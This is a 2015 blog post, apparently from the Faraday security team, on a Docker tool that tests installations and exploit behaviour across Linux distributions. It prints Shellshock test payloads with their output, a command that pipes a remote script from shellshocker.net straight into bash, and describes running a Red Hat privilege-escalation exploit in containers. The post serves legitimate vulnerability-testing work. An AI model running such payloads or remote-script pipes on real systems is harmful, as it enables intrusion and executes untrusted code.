Cross Distribution Exploit Testing

Introduction:

We were looking for an easy way to do testing for the installation of our tool, Faraday
https://github.com/infobyte/faraday with different distributions.

We wanted to do this because the installation process is normally one of the most complicated and critical processes of any new tool being implemented. It is important that the process is easy and that everything works without any hiccups so that users can get started using the tool ASAP and don't lose valuable time during the installation and set-up.

What we ended up finding to suit our needs was Docker, which is pretty similar to a chroot, but on large amounts of steroids.

Docker is a tool that automates the deployment of applications inside software containers, by providing an additional layer of abstraction and automation of operating-system-level virtualization on Linux. Docker uses resource isolation features of the Linux kernel such as cgroups and kernel namespaces to allow independent "containers" to run within a single Linux instance, avoiding the overhead of starting and maintaining virtual machines

The process we developed is pretty simple, in which we use a simple list of distributions.
  1. We generate a Docker
  2. We install Faraday
  3. We connect using the SSH to the container, exporting the X and we execute the graphic application (GUI QT)
If one of the processes doesn't work, we can evaluate what was the cause of the problem and we make a corresponding patch to remedy the problem .

We are using this process daily in our own continuous-integration system.

Cross Distribution Exploit Testing:


Using the same implementation, we can use it to do some exploitation tests in different distributions. This allows us to evaluate different scenarios and hopefully helps us make our exploits a bit more robust :)

Not all the vulnerabilities can be tested using this tool, because kernel's related problems can
't be exploited because Docker isn't a virtualization system. This includes a few simple vulnerabilities such as file permission, file race condition, environment variable code injection, etc.

The tool contains the following elements:
  • docker_build.py: This script function is to generate images of each distribution and run docker_launch.py.
  • docker_launch.py: This is the one that finally connects through the SSH and executes our command in the selected container.
  • images.txt: A list of images to use
  • extras/: Libraries and base Dockerfile used for generation of the images.
  • root/: Here, we find private keys for the ssh connection, which are necessary for testing out the GUI tests.

Case 1 - Shellshock:


A simple example to try would be shellshock:

$ ./docker_build.py -c "env x='() { :;}; echo vulnerable' bash -c \\\"echo this is a test\\\""

Start build docker: debian:7.3
..
Run build docker: debian:7.3, id: fae1bc04-b514_debian:7.3
./docker_launcher.py -c 'env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"' -t fae1bc04-b514_debian:7.3
['ssh', '-i', '/root/dev/distro_checker/extras/docker/faraday-docker.prv', '-t', '-t', '-oStrictHostKeyChecking=no', '-o UserKnownHostsFile=/dev/null', '-o LogLevel=quiet', '-X', u'root@172.17.0.93', 'env x=\'() { :;}; echo vulnerable\' bash -c "echo this is a test"']
vulnerable
this is a test
Run build docker: ubuntu:14.10, id: a07132a4-af14_ubuntu:14.10
./docker_launcher.py -c 'env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"' -t a07132a4-af14_ubuntu:14.10
['ssh', '-i', '/root/dev/distro_checker/extras/docker/faraday-docker.prv', '-t', '-t', '-oStrictHostKeyChecking=no', '-o UserKnownHostsFile=/dev/null', '-o LogLevel=quiet', '-X', u'root@172.17.0.94', 'env x=\'() { :;}; echo vulnerable\' bash -c "echo this is a test"']
this is a test

This creates 2 images (debian7.3, ubuntu 14.10) and for each image, you have to execute the exploit  CVE-2014-6271

 We can utilize a script to make it a little more organized;

$ ./docker_build.py -c "cd build && ./shellshocker.sh" #docker_build.py copy in the images all the content "." in the directory ./root/build
Run build docker: debian:7.3, id: 75b78a22-03a1_debian:7.3
CVE-2014-6271 (original shellshock): VULNERABLE
./shellshock_test2.sh: line 17:    29 Segmentation fault      shellshocker="() { x() { _;}; x() { _;} <<a; }" bash -c date 2> /dev/null
CVE-2014-6277 (segfault): VULNERABLE
CVE-2014-6278 (Florian's patch): VULNERABLE
CVE-2014-7169 (taviso bug): VULNERABLE
CVE-2014-7186 (redir_stack bug): not vulnerable
CVE-2014-7187 (nested loops off by one): not vulnerable
CVE-2014-//// (exploit 3 on http://shellshocker.net/): not vulnerable

Also, for a more automated implementation, with the exception that we use the option -i in order to go to a list of images to execute.

$ ./docker_build.py -c "curl https://shellshocker.net/shellshock_test.sh | bash" -i images.txt

In case you want to try testing again something specific for a container all you need to do is run:

$ docker ps -a # verify which is the image generated and use this id with docker_launcher in the option -t

$ ./docker_launcher.py -c "whoami" -t c92d6bf7-d559_debian:7.3


Case 2: Redhat Local Privilege Escalation CVE-2015-(3245,3246):


Last week two vulnerabilities were released that can be use to do a local privilege escalation on
redhat 6 and 7:

CVE-2015-3245 userhelper chfn() newline filtering
CVE-2015-3246 libuser passwd file handling

Let's try again the tool against this vulnerability in the following distribution rhel6.5', 'rhel7.0', 'rhel7.1', 'fedora:20 :

$ ./docker_build.py -i redhat_images.txt  -d extras/docker/Dockerfile.redhat -c id # In this scenario I directly use a specific dockerfile that runs the exploit (roothelper.c)

Distros: ['rhel6.5', 'rhel7.0', 'rhel7.1', 'fedora:20']
Start build docker: rhel6.5
...
Red Hat Enterprise Linux Server release 6.5 (Santiago)
CVE-2015-(3245,3246): VULNERABLE
...
Start build docker: rhel7.0
Red Hat Enterprise Linux Server release 7.0 (Maipo)
CVE-2015-(3245,3246): VULNERABLE
...
Start build docker: rhel7.1
Red Hat Enterprise Linux Server release 7.1 (Maipo)
CVE-2015-(3245,3246): VULNERABLE
...
Start build docker: fedora:20
Fedora release 20 (Heisenbug)
CVE-2015-(3245,3246): Not vulnerable
...

Demo:


Clean:


After a few tests, it's important not forget to stop the containers and delete them:

$ docker stop $(docker ps -a -q)
$ docker rm $(docker ps -a -q)

You have to for the images as well:
$ docker rmi $(docker images -q)

Tool:

The code can be found on github:
http://github.com/infobyte/distro_checker

To-Do:

Doing a similar process using Vagrant, we would be able to try out all kinds of vulnerabilities, as that would be a complete virtualization setting.

We hope this helps everyone in the need test their tools across a wide range of  distributions, from researchers to developers their code.

Thanks Andres for the support!

2 comments

Click here for comments
December 28, 2015 at 7:35 AM ×

Hi, thanks for sharing such an informative blog. I have read your blog and I gathered some needful information from your blog. Keep update your blog. Awaiting for your next update. Selenium Training in Chennai

Balas
avatar
admin
January 21, 2016 at 9:54 AM ×

Hi Admin,
Actually i wants to get my career foundation on Linux so i have planned to take Linux Administration and got certification also, now am searching a blog related to linux, i had more useful info's in your post, keep sharing your updates relevant to linux for helping the beginner like me.

Balas
avatar
admin
Post a Comment
Thanks for your comment